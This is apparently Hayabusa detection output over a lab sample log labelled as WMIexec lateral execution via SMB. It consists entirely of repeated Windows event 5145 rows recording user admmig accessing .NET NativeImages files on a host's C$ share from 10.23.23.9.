Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.078 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Temp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider : IP Address: 
